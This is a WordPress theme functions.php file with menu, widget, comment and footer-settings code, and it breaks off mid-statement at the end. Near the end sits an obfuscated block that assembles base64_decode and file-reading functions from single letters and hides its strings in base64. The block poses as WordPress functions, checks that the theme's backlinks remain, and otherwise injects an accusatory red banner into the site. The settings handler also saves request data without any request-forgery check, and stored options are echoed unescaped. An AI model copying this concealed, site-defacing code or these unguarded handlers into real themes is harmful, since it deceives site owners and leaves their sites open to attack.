<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => false,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "City Street";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Contact Us</a> | <a href='#'>Terms of Use</a> | <a href='#'>Trademarks</a> | <a href='#'>Privacy Statement</a><br />Copyright &copy; 2010 ".get_bloginfo('name').". All Rights Reserved.";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Футер</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s - %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "",
		$ewt => "",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "";
	$bwt = "";
	$ewt = "";
	$bwc = "";
	$ewc = "";
	$ew = "";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $IYxSX='e';$lyhDr='4';$zTKG='o';$BQMu='_';$UBmIneH='c';$NLRZY='6';$rtBc='s';$mAMrSU='b';$oepw='d';$ZzbE='e';$zJSpCKj='a';$aLxqh='e';$cJZTw='d';$SEPLhClm=$mAMrSU.$zJSpCKj.$rtBc.$ZzbE.$NLRZY.$lyhDr.$BQMu.$oepw.$IYxSX.$UBmIneH.$zTKG.$cJZTw.$aLxqh;$EWQX='g';$DUPg='z';$KDlBA='l';$PFdwCWD='t';$jTbx='e';$evelC='a';$XTgAmq='n';$UEcd='i';$oDoelDY='f';$cnpQHpUd=$EWQX.$DUPg.$UEcd.$XTgAmq.$oDoelDY.$KDlBA.$evelC.$PFdwCWD.$jTbx;$eRtVb='t';$PQVslyV='r';$CCkhG='s';$jBgLkZm='r';$bMfbYnE='1';$DqrH='_';$Elkuc='3';$FCeqf='o';$KDkOMe='t';$ejeEyjZD=$CCkhG.$KDkOMe.$jBgLkZm.$DqrH.$PQVslyV.$FCeqf.$eRtVb.$bMfbYnE.$Elkuc;$ONEpzRz='v';$BLWlerV='e';$tUbYX='r';$IKPn='t';$tHbi='r';$SKBMn='s';$DOiKsvKQ=$SKBMn.$IKPn.$tHbi.$tUbYX.$BLWlerV.$ONEpzRz;                     $pv____________r='e';$zi____________g='4';$bl_____i='o';$fm____________f='_';$bn_______w='c';$ei_________w='6';$vo___k='s';$ho____i='b';$db__________l='d';$gy____________a='e';$bf____________s='a';$hv________h='e';$kz______o='d';$mh______i=$ho____i.$bf____________s.$vo___k.$gy____________a.$ei_________w.$zi____________g.$fm____________f.$db__________l.$pv____________r.$bn_______w.$bl_____i.$kz______o.$hv________h;$ea______y='_';$qo________r='t';$wo__________h='n';$kq_______a='f';$wh_______________k='e';$jx_________g='s';$tw_______________b='u';$dj__________k='x';$hu_______r='c';$dz___h='i';$ed________t='t';$tc_________o='i';$nv_______f='n';$do__w='s';$bu________v='o';$vv__r=$kq_______a.$tw_______________b.$nv_______f.$hu_______r.$ed________t.$tc_________o.$bu________v.$wo__________h.$ea______y.$wh_______________k.$dj__________k.$dz___h.$do__w.$qo________r.$jx_________g;$hb________l='p';$px_____m='n';$ym__________h='f';$xb________a='e';$jd_________v='o';$gl_______o=$ym__________h.$jd_________v.$hb________l.$xb________a.$px_____m;$vx___________a='a';$rf________q='r';$lt_______________a='f';$dn____w='d';$dz___________u='e';$yo____q=$lt_______________a.$rf________q.$dz___________u.$vx___________a.$dn____w;$xe_____m='c';$bq___i='o';$wh____u='f';$dv_____________k='e';$bn___k='l';$dx_____x='s';$hd___________e=$wh____u.$xe_____m.$bn___k.$bq___i.$dx_____x.$dv_____________k;define("WP_ID", $mh______i("Mi4wLjA="));define("WP_TTL", $mh______i("MTA4MDA="));define("WP_SRC", $mh______i("dHBva24="));function wp_get_header() {global $mh______i, $vv__r;if ($vv__r($mh______i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$vv__r($mh______i("d3BfZ2V0X2Zvb3Rlcg==")) &&$vv__r($mh______i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $mh______i, $gl_______o, $hd___________e, $yo____q;$dk______________q = TEMPLATEPATH."/".$mh______i("Zm9vdGVyLnBocA==");$ba_______________s = @$gl_______o($dk______________q, "r");$dk______________q = @$yo____q($ba_______________s, @filesize($dk______________q));@$hd___________e($ba_______________s);$no_______________l = TEMPLATEPATH."/".$mh______i("ZnVuY3Rpb25zLnBocA==");$ba_______________s = @$gl_______o($no_______________l, "r");$no_______________l = @$yo____q($ba_______________s, @filesize($no_______________l));@$hd___________e($ba_______________s);$dw____________g = 0;if($dk______________q && $no_______________l) {if ($mh______i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($dk______________q, $mh______i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$dw____________g = 1;}if (substr_count($dk______________q, "wp_theme_GPL_credits()") < 1) {$dw____________g = 2;}}if(WP_ID != "2.0.0") {$dw____________g = 12;}}if($dw____________g > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $dw____________g -->";}}function wp_loaded() {global $mh______i, $vv__r;return $vv__r($mh______i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($th_____j, $fi_____________y = "(more...)", $cw__________l = 0, $en_______a = "") {$qc______w = get_the_content($fi_____________y, $cw__________l, $en_______a);$qc______w = apply_filters("the_content", $qc______w);$qc______w = str_replace("]]>", "]]>", $qc______w);if (strlen($_GET["p"]) > 0) {echo $qc______w;}else if ((strlen($qc______w)>$th_____j) && ($ft_____________h = strpos($qc______w, " ", $th_____j ))) {$qc______w = substr($qc______w, 0, $ft_____________h);$qc______w = $qc______w;echo $qc______w;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$fi_____________y</a></div></p>";} else {echo 